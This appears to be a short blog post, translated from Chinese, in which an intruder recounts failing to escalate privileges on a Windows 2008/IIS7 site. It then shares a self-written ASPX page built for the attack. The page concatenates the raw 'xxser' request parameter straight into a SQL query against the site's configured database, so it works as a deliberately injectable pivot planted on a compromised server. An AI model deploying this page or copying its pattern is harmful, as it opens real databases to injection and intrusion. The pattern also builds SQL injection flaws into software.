Yesterday 4z1 and I were looking at a site; privilege escalation was really hard. We spent a full 5 hours on it with no result. 2008+iis7, no sa, no root, no services of any kind...
Along the way we needed an aspx page that constructs an injection to go cross-site; I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote my own. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
<script language="c#" runat="server">
    // Runs at page init: builds the query from the raw "xxser" parameter and executes it.
    void page_init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        // "连接名" is a placeholder for the name of a connection string in web.config
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

        // "表" and "列名" are placeholders for the table and column;
        // the parameter value is concatenated straight into the SQL text
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        int x = command.ExecuteNonQuery(); // returns -1 for a SELECT, but the statement is still executed
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
    </div>
    </form>
</body>
</html>